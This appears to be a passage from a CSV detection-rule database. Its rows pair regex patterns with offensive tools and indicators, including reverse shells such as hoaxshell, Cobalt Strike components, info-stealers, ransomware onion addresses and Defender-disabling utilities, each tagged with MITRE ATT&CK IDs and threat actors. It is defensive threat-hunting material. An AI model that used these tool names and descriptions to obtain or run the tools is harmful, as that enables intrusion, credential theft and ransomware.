"*https://t.me/moom825*",".{0,1000}https\:\/\/t\.me\/moom825.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","47950"
"*https://t.me/NovaGroup2023*",".{0,1000}https\:\/\/t\.me\/NovaGroup2023.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47951"
"*https://t.me/peass*",".{0,1000}https\:\/\/t\.me\/peass.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","47952"
"*https://t.me/ransom_house*",".{0,1000}https\:\/\/t\.me\/ransom_house.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47953"
"*https://thc.org/hs*",".{0,1000}https\:\/\/thc\.org\/hs.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","1","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","47961"
"*https://tor2web.*","https\:\/\/tor2web\..{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","47964"
"*https://transfer.sh/get/*/*.pdf*",".{0,1000}https\:\/\/transfer\.sh\/get\/.{0,1000}\/.{0,1000}\.pdf.{0,1000}","offensive_tool_keyword","transfer.sh","Downloading pdf  from transfer.sh","T1105 - T1204 - T1071 - T1195","TA0002 - TA0005 - TA0006","N/A","Black Basta","Collection","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","1","#filehostingservice","N/A","10","8","N/A","N/A","N/A","N/A","47968"
"*https://transfer.sh/get/*/*.py*","https\:\/\/transfer\.sh\/get\/.{0,1000}\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","transfer.sh","Downloading python scripts from transfer.sh","T1105 - T1204 - T1071 - T1195","TA0002 - TA0005 - TA0006","N/A","Black Basta","Collection","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","1","#filehostingservice","N/A","10","8","N/A","N/A","N/A","N/A","47969"
"*https://trufflesecurity.com/canaries*",".{0,1000}https\:\/\/trufflesecurity\.com\/canaries.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","1","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","47972"
"*https://tuns.sh*",".{0,1000}https\:\/\/tuns\.sh.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","47976"
"*https://unit259.fyi/db*",".{0,1000}https\:\/\/unit259\.fyi\/db.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","47980"
"*https://viperone.gitbook.io/pentest-everything*",".{0,1000}https\:\/\/viperone\.gitbook\.io\/pentest\-everything.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","47985"
"*https://watch-youtube-videos-live*",".{0,1000}https\:\/\/watch\-youtube\-videos\-live.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","47986"
"*https://weakpass.com/*",".{0,1000}https\:\/\/weakpass\.com\/.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","47988"
"*https://web.archive.org/*https://www.kernel-exploits.com/media/*",".{0,1000}https\:\/\/web\.archive\.org\/.{0,1000}https\:\/\/www\.kernel\-exploits\.com\/media\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","47989"
"*https://wfuzz.readthedocs.io*",".{0,1000}https\:\/\/wfuzz\.readthedocs\.io.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","47993"
"*https://whoamianony.top/posts/*",".{0,1000}https\:\/\/whoamianony\.top\/posts\/.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","1","N/A","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","47994"
"*https://www.1secmail.com/api/v1/?action=getDomainList*",".{0,1000}https\:\/\/www\.1secmail\.com\/api\/v1\/\?action\=getDomainList.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","47995"
"*https://www.1secmail.com/api/v1/?action=getMessages&login=*",".{0,1000}https\:\/\/www\.1secmail\.com\/api\/v1\/\?action\=getMessages\&login\=.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","47996"
"*https://www.1secmail.com/api/v1/?action=readMessage&login=*",".{0,1000}https\:\/\/www\.1secmail\.com\/api\/v1\/\?action\=readMessage\&login\=.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","47997"
"*https://www.blackarch.org/blackarch/blackarch/lastupdate*",".{0,1000}https\:\/\/www\.blackarch\.org\/blackarch\/blackarch\/lastupdate.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","48000"
"*https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz*",".{0,1000}https\:\/\/www\.blackhillsinfosec\.com\/bypass\-anti\-virus\-run\-mimikatz.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","48001"
"*https://www.browserling.com/browse*",".{0,1000}https\:\/\/www\.browserling\.com\/browse.{0,1000}","offensive_tool_keyword","browserling","proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","browserling.com","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","48002"
"*https://www.exploit-db.com/exploits/41607*",".{0,1000}https\:\/\/www\.exploit\-db\.com\/exploits\/41607.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","0","#content","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","48007"
"*https://www.hashkill.com*",".{0,1000}https\:\/\/www\.hashkill\.com.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","48010"
"*https://www.joeware.net/downloads/dl2.php*",".{0,1000}https\:\/\/www\.joeware\.net\/downloads\/dl2\.php.{0,1000}","offensive_tool_keyword","NetSess","Command line tool to enumerate NetBIOS sessions on a specified local or remote machine. ","T1016 - T1046 - T1087","TA0007 - TA0043","N/A","MUSTANG PANDA","Discovery","https://www.joeware.net/freetools/tools/netsess/","1","1","N/A","could be any joeware softwares","7","9","N/A","N/A","N/A","N/A","48011"
"*https://www.myget.org/F/fireeye/api/v2*",".{0,1000}https\:\/\/www\.myget\.org\/F\/fireeye\/api\/v2.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","N/A","10","7168","1313","2024-09-24T19:14:18Z","2019-03-26T22:36:32Z","48015"
"*https://www.nirsoft.net/utils/webcamimagesave.zip*","https\:\/\/www\.nirsoft\.net\/utils\/webcamimagesave\.zip","offensive_tool_keyword","nirsoft","designed to capture webcam images","T1125 - T1056.004 - T1140","TA0005 - TA0006","N/A","N/A","Collection","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","1","N/A","N/A","10","8","N/A","N/A","N/A","N/A","48021"
"*https://www.somd5.com*",".{0,1000}https\:\/\/www\.somd5\.com.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","48029"
"*https://www.sordum.org/downloads/?st-defender-control*",".{0,1000}https\:\/\/www\.sordum\.org\/downloads\/\?st\-defender\-control.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","48030"
"*https://www.synacktiv.com/publications/ounedpy-exploiting-hidden-organizational-units-acl-attack-vectors-in-active-directory*",".{0,1000}https\:\/\/www\.synacktiv\.com\/publications\/ounedpy\-exploiting\-hidden\-organizational\-units\-acl\-attack\-vectors\-in\-active\-directory.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","1","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","48031"
"*https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/*",".{0,1000}https\:\/\/www\.trustedsec\.com\/blog\/abusing\-windows\-telemetry\-for\-persistence\/.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","1","N/A","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","48033"
"*https://www.win-rar.co/panel/*",".{0,1000}https\:\/\/www\.win\-rar\.co\/panel\/.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","1","N/A","N/A","10","7","N/A","N/A","N/A","N/A","48034"
"*https://www.youtube.com/watch?v=2eHsnZ4BeDI*",".{0,1000}https\:\/\/www\.youtube\.com\/watch\?v\=2eHsnZ4BeDI.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","0","N/A","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","48037"
"*https://www.youtube.com/watch?v=9_fJv_weLU0*",".{0,1000}https\:\/\/www\.youtube\.com\/watch\?v\=9_fJv_weLU0.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","48038"
"*https://youareanidiot.cc*",".{0,1000}https\:\/\/youareanidiot\.cc.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","N/A","10","","N/A","","","","48039"
"*https://YOURREDIRECTWEBSERVER.azurewebsites.net*",".{0,1000}https\:\/\/YOURREDIRECTWEBSERVER\.azurewebsites\.net.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","1","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48040"
"*https_payload_localtunnel.ps1*",".{0,1000}https_payload_localtunnel\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","48044"
"*https_payload_localtunnel_outfile.ps1*",".{0,1000}https_payload_localtunnel_outfile\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","48045"
"*https_payload_ngrok.ps1*",".{0,1000}https_payload_ngrok\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","48046"
"*https_payload_ngrok_outfile.ps1*",".{0,1000}https_payload_ngrok_outfile\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","48047"
"*https_payload_trusted.ps1*",".{0,1000}https_payload_trusted\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","48048"
"*https_revshell.exe*",".{0,1000}https_revshell\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","48049"
"*HTTP-Server.py *",".{0,1000}HTTP\-Server\.py\s.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","N/A","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","48050"
"*httpsmuggler.jar*",".{0,1000}httpsmuggler\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","48051"
"*'http-stager'*",".{0,1000}\'http\-stager\'.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","48052"
"*huan.exe *.exe",".{0,1000}huan\.exe\s.{0,1000}\.exe","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tool","https://github.com/frkngksl/Huan","1","0","N/A","N/A","N/A","6","540","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z","48053"
"*Huan.sln*",".{0,1000}Huan\.sln.{0,1000}","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tool","https://github.com/frkngksl/Huan","1","1","N/A","N/A","N/A","6","540","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z","48054"
"*Huan.vcxproj*",".{0,1000}Huan\.vcxproj.{0,1000}","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tool","https://github.com/frkngksl/Huan","1","1","N/A","N/A","N/A","6","540","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z","48055"
"*HuanLoader.vcxproj*",".{0,1000}HuanLoader\.vcxproj.{0,1000}","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tool","https://github.com/frkngksl/Huan","1","1","N/A","N/A","N/A","6","540","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z","48056"
"*hub.docker.com/u/kalilinux/*",".{0,1000}hub\.docker\.com\/u\/kalilinux\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","48057"
"*HunnicCyber/SharpDomainSpray*",".{0,1000}HunnicCyber\/SharpDomainSpray.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","N/A","10","1","90","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z","48060"
"*hunters33dootzzwybhxyh6xnmumopeoza6u4hkontdqu7awnhmix7ad.onion*",".{0,1000}hunters33dootzzwybhxyh6xnmumopeoza6u4hkontdqu7awnhmix7ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","48061"
"*hunters33mmcwww7ek7q5ndahul6nmzmrsumfs6aenicbqon6mxfiqyd.onion*",".{0,1000}hunters33mmcwww7ek7q5ndahul6nmzmrsumfs6aenicbqon6mxfiqyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","48062"
"*hunters55atbdusuladzv7vzv6a423bkh6ksl2uftwrxyuarbzlfh7yd.onion*",".{0,1000}hunters55atbdusuladzv7vzv6a423bkh6ksl2uftwrxyuarbzlfh7yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","48063"
"*hunters55rdxciehoqzwv7vgyv6nt37tbwax2reroyzxhou7my5ejyid.onion*",".{0,1000}hunters55rdxciehoqzwv7vgyv6nt37tbwax2reroyzxhou7my5ejyid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","48064"
"*HVNC - Tinynuke Clone [Melted@HF]*",".{0,1000}HVNC\s\-\sTinynuke\sClone\s\[Melted\@HF\].{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","48065"
"*HVNC - Tinynuke Clone*",".{0,1000}HVNC\s\-\sTinynuke\sClone.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","48066"
